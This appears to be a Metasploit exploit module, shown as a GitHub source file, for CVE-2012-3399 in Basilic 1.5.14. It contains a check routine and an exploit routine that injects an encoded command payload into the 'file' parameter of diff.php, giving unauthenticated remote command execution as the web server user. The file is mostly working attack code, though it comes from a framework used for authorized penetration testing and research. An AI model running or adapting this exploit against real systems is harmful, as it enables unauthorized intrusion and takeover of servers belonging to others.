metasploit-framework/modules/exploits/unix/webapp/basilic_diff_exec.rb at 0bf595c2ecba4ee10763fa6cd96dd13dbedf77e9 · adfoster-r7/metasploit-framework · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
        'Description' => %q{
          This module abuses a metacharacter injection vulnerability in the
          diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
          commands as the www-data user account.
        },
        'Author' => [
          'lcashdollar',
          'sinn3r',
          'juan vazquez'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-3399' ],
          [ 'OSVDB', '83719' ],
          [ 'BID', '54234' ]
        ],
        'Platform' => %w{linux unix},
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Payload' => {
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl ruby python telnet'
                        }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-06-28',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
      ]
    )
  end

  def check
    base = normalize_uri(target_uri.path)

    sig = rand_text_alpha(10)

    res = send_request_cgi({
      'uri' => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => sig,
        'new' => '1',
        'old' => '2'
      }
    })

    if res and res.code == 200 and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable('The target is vulnerable')
    end

    return Exploit::CheckCode::Safe('The target is not vulnerable')
  end

  def exploit
    print_status("Sending GET request...")

    base = normalize_uri(target_uri.path)

    res = send_request_cgi({
      'uri' => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => "&#{payload.encoded} #",
        'new' => '1',
        'old' => '2'
      }
    })

    if res and res.code == 404 then
      print_error("404 Basilic not installed or possibly check URI Path.")
    else
      vprint_line("Server returned #{res.code}")
    end

    handler
  end
end